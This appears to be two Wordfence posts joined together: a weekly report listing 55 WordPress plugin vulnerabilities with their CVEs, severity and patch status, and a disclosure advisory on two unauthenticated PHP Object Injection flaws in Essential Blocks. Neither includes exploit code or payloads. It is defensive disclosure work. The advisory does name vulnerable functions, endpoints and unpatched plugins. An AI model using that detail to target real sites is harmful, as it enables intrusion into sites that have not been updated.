Wordfence Intelligence Weekly WordPress Vulnerability Report (September 11, 2023 to September 17, 2023)

Last week, there were 55 vulnerabilities disclosed in 46 WordPress Plugins and no WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 15 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data to make the internet more secure. That is why the Wordfence Intelligence user interface, vulnerability API and webhook notifications are completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.


New Firewall Rules Deployed Last Week

The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.

The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our Premium, Care, and Response customers last week:

Wordfence Premium, Care, and Response customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.


Total Unpatched & Patched Vulnerabilities Last Week

Patch Status Number of Vulnerabilities
Unpatched 16
Patched 39

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating Number of Vulnerabilities
Low Severity 0
Medium Severity 37
High Severity 16
Critical Severity 2

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) 18
Cross-Site Request Forgery (CSRF) 7
Missing Authorization 6
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) 5
Deserialization of Untrusted Data 5
Information Exposure 4
Authorization Bypass Through User-Controlled Key 3
Server-Side Request Forgery (SSRF) 2
Improper Control of Generation of Code (‘Code Injection’) 1
Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’) 1
Incorrect Privilege Assignment 1
Improper Authorization 1
Unverified Password Change 1

Researchers That Contributed to WordPress Security Last Week

Researcher Name Number of Vulnerabilities
Lana Codes
(Wordfence Vulnerability Researcher)
20
foobar7 5
Marco Wotschka
(Wordfence Vulnerability Researcher)
5
Yan&Co ApS 2
Vladislav Pokrovsky 2
Chloe Chamberland
(Wordfence Vulnerability Researcher)
1
Nguyen Anh Tien 1
Do Xuan Trung 1
osama-hamad 1
Rafie Muhammad 1
Dmitrii Ignatyev 1
Alex Thomas
(Wordfence Vulnerability Researcher)
1
teo23mal 1
David Anderson 1
Pablo Sanchez 1

 

Are you a security researcher who would like to be featured in our weekly vulnerability report? You can responsibly disclose your WordPress vulnerability discoveries to us and obtain a CVE ID through this form. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the Wordfence Intelligence leaderboard along with being mentioned in our weekly vulnerability report.


WordPress Plugins with Reported Vulnerabilities Last Week

Software Name Software Slug
10Web Map Builder for Google Maps wd-google-maps
Allow PHP in Posts and Pages allow-php-in-posts-and-pages
Awesome Weather Widget awesome-weather
BAN Users ban-users
Booking Calendar booking
Booking calendar, Appointment Booking System booking-calendar
Booster for WooCommerce woocommerce-jetpack
Checkout Field Editor woocommerce-checkout-field-editor
Comments – wpDiscuz wpdiscuz
Crayon Syntax Highlighter crayon-syntax-highlighter
DoLogin Security dologin
Dropbox Folder Share dropbox-folder-share
Enable Media Replace enable-media-replace
Essential Addons for Elementor essential-addons-for-elementor-lite
Essential Blocks Pro essential-blocks-pro
Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates essential-blocks
Feeds for YouTube (YouTube video, channel, and gallery plugin) feeds-for-youtube
File Manager Pro – Filester filester
Google Maps Plugin by Intergeo intergeo-maps
Horizontal scrolling announcement horizontal-scrolling-announcement
JQuery Accordion Menu Widget jquery-vertical-accordion-menu
Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation zero-bs-crm
Leyka leyka
Login with phone number login-with-phone-number
MapPress Maps for WordPress mappress-google-maps-for-wordpress
Migration, Backup, Staging – WPvivid wpvivid-backuprestore
MultiVendorX – MultiVendor Marketplace Solution For WooCommerce dc-woocommerce-multi-vendor
Page Builder: Pagelayer – Drag and Drop website builder pagelayer
Photospace Responsive Gallery photospace-responsive
PowerPress Podcasting plugin by Blubrry powerpress
Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress quiz-master-next
Read More & Accordion expand-maker
ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF shortpixel-image-optimiser
Simplr Registration Form Plus+ simplr-registration-form
Slimstat Analytics wp-slimstat
Testimonial Slider Shortcode testimonial-slider-shortcode
WP Customer Reviews wp-customer-reviews
WP User Control wp-user-control
WS Facebook Like Box Widget ws-facebook-likebox
Welcart e-Commerce usc-e-shop
WooCommerce woocommerce
WooCommerce Beta Tester woocommerce-beta-tester
WooCommerce CVR Payment Gateway woocommerce-cvr-payment-gateway
WooCommerce EAN Payment Gateway woocommerce-ean-payment-gateway
WooCommerce Subscription woocommerce-subscriptions
WordPress File Upload wp-file-upload
woocommerce-checkout-field-editor woocommerce-checkout-field-editor

Vulnerability Details

Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities.

Allow PHP in Posts and Pages <= 3.0.4 – Authenticated (Subscriber+) Remote Code Execution via Shortcode

Affected Software: Allow PHP in Posts and Pages
CVE ID: CVE-2023-4994
CVSS Score: 9.9 (Critical)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3d8b4bb6-3715-40c1-8140-7fcf874ccec3

Dropbox Folder Share <= 1.9.7 – Unauthenticated Local File Inclusion

Affected Software: Dropbox Folder Share
CVE ID: CVE-2023-4488
CVSS Score: 9.8 (Critical)
Researcher/s: Marco Wotschka
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/647a2f27-092a-4db1-932d-87ae8c2efcca

Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Blind SQL Injection via Shortcode

Affected Software: Slimstat Analytics
CVE ID: CVE-2023-4598
CVSS Score: 8.8 (High)
Researcher/s: Chloe Chamberland, Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/07c0f5a5-3455-4f06-b481-f4d678309c50

Welcart e-Commerce <= 2.8.21 – Authenticated(level_5+) SQL Injection via get_logs

Affected Software: Welcart e-Commerce
CVE ID: CVE Unknown
CVSS Score: 8.8 (High)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/35dadb9c-f0c6-4b74-bb31-5e9d504b3db5

Simplr Registration Form Plus+ <= 2.4.5 – Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change

Affected Software: Simplr Registration Form Plus+
CVE ID: CVE-2023-4213
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6ddf0452-3afe-4ada-bccc-30c818968a81

Login with phone number <= 1.4.8 – Cross-Site Request Forgery to User Password Change

Affected Software: Login with phone number
CVE ID: CVE-2023-4916
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/71083db7-377b-47a1-ac8b-83d8974a2654

Essential Addons for Elementor <= 5.8.8 – Authenticated (Contributor+) Privilege Escalation

Affected Software: Essential Addons for Elementor
CVE ID: CVE-2023-41955
CVSS Score: 8.8 (High)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8c13701e-424d-462f-b152-4dc5ad3ef197

BAN Users <= 1.5.3 – Missing Authorization to Authenticated (Subscriber+) Settings Update & Privilege Escalation

Affected Software: BAN Users
CVE ID: CVE-2023-4153
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/af6bd2db-47a4-4381-a881-d5f97a159f8d

Horizontal scrolling announcement <= 9.2 – Authenticated (Subscriber+) SQL Injection via Shortcode

Affected Software: Horizontal scrolling announcement
CVE ID: CVE-2023-4999
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bf50922a-58a6-4ca4-80b7-cafb37b87216

File Manager Pro – Filester – <= 1.7.6 – Cross-Site Request Forgery to Arbitrary File Rename

Affected Software: File Manager Pro – Filester
CVE ID: CVE-2023-4827
CVSS Score: 8.8 (High)
Researcher/s: Dmitrii Ignatyev
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cfbc7af2-1e2c-4aaf-b73c-870f7519aff1

MultiVendorX <= 4.0.25 – Improper Authorization on REST Routes via ‘save_settings_permission’

Affected Software: MultiVendorX – MultiVendor Marketplace Solution For WooCommerce
CVE ID: CVE Unknown
CVSS Score: 8.6 (High)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/afd9046c-5b6a-411e-8e66-ff1ba60d7f9d

WPvivid Backup Plugin <= 0.9.90 – Missing Authorization via ‘start_staging’ and ‘get_staging_progress’

Affected Software: Migration, Backup, Staging – WPvivid
CVE ID: CVE-2023-41243
CVSS Score: 8.3 (High)
Researcher/s: Nguyen Anh Tien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/28e723ee-e99a-4ec4-b492-bfba04d27fd0

Essential Blocks <= 4.2.0 – Unauthenticated PHP Object Injection via products


Essential Blocks <= 4.2.0 – Unauthenticated PHP Object Injection via queries


Read More & Accordion <= 3.2.2 – Authenticated (Administrator+) PHP Object Injection

Affected Software: Read More & Accordion
CVE ID: CVE-2023-3392
CVSS Score: 7.2 (High)
Researcher/s: Do Xuan Trung
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/73ab9f95-05cc-47fc-bfcb-1787f6f80789

Booking calendar, Appointment Booking System <= 3.2.8 – Multiple Authenticated(Editor+) SQL Injection

Affected Software: Booking calendar, Appointment Booking System
CVE ID: CVE Unknown
CVSS Score: 7.2 (High)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/a02f4fc4-42ca-4f8e-9c28-bfa69644e7b6

Dropbox Folder Share <= 1.9.7 – Unauthenticated Server-Side Request Forgery via ‘link’

Affected Software: Dropbox Folder Share
CVE ID: CVE-2023-3025
CVSS Score: 7.2 (High)
Researcher/s: Alex Thomas
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d62bd2bd-db01-479f-89e4-8031d69a912f

WooCommerce Beta Tester < 2.2.4 – Authenticated (Administrator+) SQL Injection

Affected Software: WooCommerce Beta Tester
CVE ID: CVE Unknown
CVSS Score: 7.2 (High)
Researcher/s: teo23mal
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d6cbec61-cbe8-44a6-8cc8-8603393ed6b0

Enable Media Replace <= 4.1.2 – Authenticated(Editor+) PHP Object Injection

Affected Software: Enable Media Replace
CVE ID: CVE Unknown
CVSS Score: 6.6 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6e7e6445-c1c5-48a8-a76d-819f2db1efc2

ShortPixel Image Optimizer <= 5.4.1 – Authenticated(Editor+) PHP Object Injection

Affected Software: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF
CVE ID: CVE Unknown
CVSS Score: 6.6 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9f23bf62-6008-4a9c-a7ae-a2e513699684

Booking Calendar <= 9.7.3 – Unauthenticated Stored Cross-Site Scripting

Affected Software: Booking Calendar
CVE ID: CVE-2023-4620
CVSS Score: 6.5 (Medium)
Researcher/s: Pablo Sanchez
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f883823f-c225-4cd2-a0f6-39013476ed83

Testimonial Slider Shortcode <= 1.1.8 – Authenticated (Contributor+) Cross-Site Scripting Vulnerability via Shortcode

Affected Software: Testimonial Slider Shortcode
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/30cb1b8c-84ce-4401-9c30-775efb257fe6

Feeds for YouTube <= 2.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Feeds for YouTube (YouTube video, channel, and gallery plugin)
CVE ID: CVE-2023-4841
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/376e2638-a873-4142-ad7d-067ae3333709

Awesome Weather Widget <= 3.0.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Awesome Weather Widget
CVE ID: CVE-2023-4944
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3bf77988-370b-437f-83a0-18a147e3e087

Crayon Syntax Highlighter <= 2.8.4 – Authenticated (Contributor+) Server Side Request Forgery

Affected Software: Crayon Syntax Highlighter
CVE ID: CVE-2023-4893
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/527f75f1-6361-4e16-8ae4-d38ca4589811

WS Facebook Like Box Widget <= 5.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: WS Facebook Like Box Widget
CVE ID: CVE-2023-4963
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8bebc229-9d15-439f-a8df-f68455bc5193

Booster for WooCommerce <= 7.1.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Booster for WooCommerce
CVE ID: CVE-2023-4945
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/981639a3-63c4-4b3f-827f-4d770bd44806

PowerPress <= 11.0.10 – Authenticated(Contributor+) Stored Cross-Site Scripting via Media URL

Affected Software: PowerPress Podcasting plugin by Blubrry
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ae8c888e-46ed-468f-a5d5-74a7f9d01a36

JQuery Accordion Menu Widget <= 3.1.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: JQuery Accordion Menu Widget
CVE ID: CVE-2023-4890
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b0cf3015-cdc9-4ac9-82f3-e9b4d1203e22

MapPress Maps for WordPress <= 2.88.4 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: MapPress Maps for WordPress
CVE ID: CVE-2023-4840
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c3d2c9a4-32f7-484f-86ce-a33ef1174b28

Google Maps Plugin by Intergeo <= 2.3.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Google Maps Plugin by Intergeo
CVE ID: CVE-2023-4887
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cb6d11ad-0983-4a4b-b52b-824eae8b8e3c

Horizontal scrolling announcement <= 9.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Horizontal scrolling announcement
CVE ID: CVE-2023-5001
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d4f60e8c-2745-4930-9101-914bd73c6e1c

Jetpack CRM <= 5.5.0 – Authenticated (Client+) Stored Cross-Site Scripting

Affected Software: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e1dbd0e2-8c6c-4127-b37c-269af3b7f71c

PageLayer <= 1.7.6 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Page Builder: Pagelayer – Drag and Drop website builder
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e34b6ae5-1370-4058-95dd-5686978ca45b

WooCommerce <= 7.8.2 – Sensitive Information Exposure

Affected Software: WooCommerce
CVE ID: CVE Unknown
CVSS Score: 5.3 (Medium)
Researcher/s: osama-hamad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7b2d1879-c337-41c9-9f47-f9c2fe8e5928

wpDiscuz <= 7.6.3 – Insecure Direct Object Reference to Post Rating Increase/Decrease

Affected Software: Comments – wpDiscuz
CVE ID: CVE-2023-3998
CVSS Score: 5.3 (Medium)
Researcher/s: Vladislav Pokrovsky
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9d09bdab-ffab-44cc-bba2-821b21a8e343

wpDiscuz <= 7.6.3 – Insecure Direct Object Reference to Comment Rating Increase/Decrease

Affected Software: Comments – wpDiscuz
CVE ID: CVE-2023-3869
CVSS Score: 5.3 (Medium)
Researcher/s: Vladislav Pokrovsky
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b30ac1b0-eae2-4194-bf8e-ae73b4236965

Leyka <= 3.30.3 – Authenticated (Subscriber+) Sensitive Information Exposure

Affected Software: Leyka
CVE ID: CVE-2023-4917
CVSS Score: 5.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/dcd24b90-94ff-4625-8e3e-9c90e38683f9

WP User Control <= 1.5.3 – Insecure Password Reset Mechanism

Affected Software: WP User Control
CVE ID: CVE-2023-4915
CVSS Score: 5.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f4ca1736-7b99-49db-9367-586dbc14df41

WooCommerce <= 7.0.0 – Authenticated(Shop Manager+) Sensitive Information Exposure

Affected Software: WooCommerce
CVE ID: CVE Unknown
CVSS Score: 4.9 (Medium)
Researcher/s: David Anderson
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f1efcff5-3af6-4c44-9654-b917523419aa

WordPress File Upload <= 4.23.2 – Authenticated(Administrator+) Stored Cross-Site Scripting

Affected Software: WordPress File Upload
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/0e1915d9-8ea9-4ab2-9746-3c49bc0bd7c8

Jetpack CRM <= 5.5.0 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/32f2fc21-165c-483f-ab81-48d8f221e4be

Photospace Responsive <= 2.1.1 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Photospace Responsive Gallery
CVE ID: CVE-2023-4271
CVSS Score: 4.4 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3bc98896-6ff9-40de-ace2-2ca331c2a44a

Migration, Backup, Staging – WPvivid <= 0.9.90 – Authenticated(Administrator+) Stored Cross-Site Scripting

Affected Software: Migration, Backup, Staging – WPvivid
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b6d3ede8-465e-4588-b8ef-36bcd1850ec3

WP Customer Reviews <= 3.6.6 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: WP Customer Reviews
CVE ID: CVE-2023-4648
CVSS Score: 4.4 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f81950be-de32-4fa1-94fe-42667414fe2d

WooCommerce Subscription < 4.6.0 – Cross-Site Request Forgery

Affected Software: WooCommerce Subscription
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/08a98c08-cddc-4bc3-bc07-15d084070abd

DoLogin Security <= 3.7 – Missing Authorization on Dashboard Widget

Affected Software: DoLogin Security
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/24e2b96c-665f-4616-ac99-1a2b1b0a9ccd

WooCommerce EAN Payment Gateway < 6.1.0 – Missing Authorization to Authenticated (Contributor+) EAN Update

Affected Software: WooCommerce EAN Payment Gateway
CVE ID: CVE-2023-4947
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes, Yan&Co ApS
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/2760b183-3c15-4f0e-b72f-7c0333f9d4b6

Quiz And Survey Master <= 8.1.15 – Cross-Site Request Forgery via ‘display_results’

Affected Software: Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/32173d38-7f85-4e0c-9b4c-38bee2783d77

10Web Map Builder for Google Maps <= 1.0.73 – Cross-Site Request Forgery to Notice Dismissal

Affected Software: 10Web Map Builder for Google Maps
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4be81ba0-c678-4234-b63e-da9813817bef

10Web Map Builder for Google Maps <= 1.0.73 – Missing Authorization to Notice Dismissal

Affected Software: 10Web Map Builder for Google Maps
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/63666c16-9f68-4a27-b163-4c25f0a7589e

Checkout Field Editor (Premium) < 1.7.5 – Cross-Site Request Forgery

Affected Software: woocommerce-checkout-field-editor
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/a4647210-ba7e-4233-83d6-12572213f5fb

Booster for WooCommerce <= 7.1.0 – Authenticated (Subscriber+) Information Disclosure via Shortcode

Affected Software: Booster for WooCommerce
CVE ID: CVE-2023-4796
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/a4cd49b2-ff93-4582-906b-b690d8472c38

Checkout Field Editor <= 1.7.4 – Cross-Site Request Forgery to Checkout Fields Update

Affected Software: Checkout Field Editor
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ad430706-749f-4582-af07-6c543b8d5aad

WooCommerce CVR Payment Gateway < 6.1.0 – Missing Authorization to Authenticated (Contributor+) CVR Update

Affected Software: WooCommerce CVR Payment Gateway
CVE ID: CVE-2023-4948
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes, Yan&Co ApS
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f72ba0e2-a9c4-43b0-a01f-185554090162

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us using our CVE Request form, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (September 11, 2023 to September 17, 2023) appeared first on Wordfence.

Two PHP Object Injection Vulnerabilities Fixed in Essential Blocks

On August 18, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for two PHP Object Injection vulnerabilities in the Essential Blocks plugin for WordPress, a plugin with over 100,000 installations.

We received a response three days later and sent over our full disclosure on August 23, 2023. A patched version of the free plugin, 4.2.1, was released on August 29, 2023 with version 1.1.1 for the Pro version released the same day.

We issued a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers on August 18, 2023. Sites still running the free version of Wordfence received the same protection on September 17, 2023. We recommend that all Wordfence users update to the patched version, 4.2.1 (1.1.1 for Pro), as soon as possible as this will entirely eliminate the vulnerabilities.

Vulnerability Summary from Wordfence Intelligence

Description: Insecure Deserialization/PHP Object Injection via queries
Affected Plugin: Essential Blocks, Essential Blocks Pro
Plugin slug: essential-blocks, essential-blocks-pro
Vendor: WPDeveloper
Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)
CVE ID: CVE-2023-4386
CVSS score: 8.1 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher: Marco Wotschka
Fully Patched Version: 4.2.1 & 1.1.1

The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_posts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

Description: Insecure Deserialization/PHP Object Injection via products
Affected Plugin: Essential Blocks, Essential Blocks Pro
Plugin slug: essential-blocks
Vendor: WPDeveloper
Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)
CVE ID: CVE-2023-4402
CVSS score: 8.1 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher: Marco Wotschka
Fully Patched Version: 4.2.1 & 1.1.1

The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_products function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

Technical Analysis

The Essential Blocks plugin provides more than 40 blocks to its users including sliders, buttons, pricing tables, maps and others. An API is provided to query for posts and products via the queries and products API endpoints which do not require authentication.

Unfortunately, query data and attributes were passed in PHP’s serialized string format and were subsequently unserialized by the functions get_posts (for the queries endpoint) and get_products (for the products endpoint) in /includes/API/PostBlock.php and /includes/API/Product.php, respectively.

get_posts function

get_products function

Attackers could utilize this to inject a PHP object with properties of their choosing. The presence of a PHP POP chain can make it possible for an attacker to execute arbitrary code, create and delete files and potentially ultimately take over a vulnerable site. Fortunately, no POP chain is present in the Essential Blocks plugin, which means an attacker would require another plugin or theme installed on the vulnerable site with a POP chain present in order to fully exploit these vulnerabilities. It is worth mentioning that POP chains can sometimes be found in popular plugins and libraries which include destructor methods that perform cleanup tasks when an Object is destroyed or deserialized.

Despite the lack of a POP chain in the Essential Blocks plugin itself, and the complexity involved in exploiting these types of vulnerabilities, a successful attack often leads to severe consequences. We explain how PHP Object Injections work in this blog post, if you are interested to find out more about their inner workings.

Timeline

August 17, 2023 – The Wordfence Threat Intelligence team discovers two PHP Object Injection vulnerabilities in the Essential Blocks plugin.
August 18, 2023 – We release a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers and initiate the disclosure process.
August 23, 2023 – We send the full disclosure to the plugin developer.
August 29, 2023 – A patched version of the Essential Blocks plugin, 4.2.1 (1.1.1 for Pro), is released.
September 17, 2023 – The firewall rule becomes available to free Wordfence users.

Conclusion

In this blog post, we covered two PHP Object Injection vulnerabilities in the Essential Blocks plugin affecting versions 4.2.0 and earlier in the Free version of the plugin and versions 1.1.0 and earlier in the Pro version. These vulnerabilities allow unauthenticated threat actors to query the plugin’s API using serialized malicious payloads that are subsequently deserialized. They have been fully addressed in version 4.2.1 of the free version of the plugin and 1.1.1 of the Pro version of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of Essential Blocks.

All Wordfence running Wordfence Premium, Wordfence Care, and Wordfence Response, have been protected against these vulnerabilities as of August 18, 2023. Users still using the free version of Wordfence received protection on September 17, 2023.

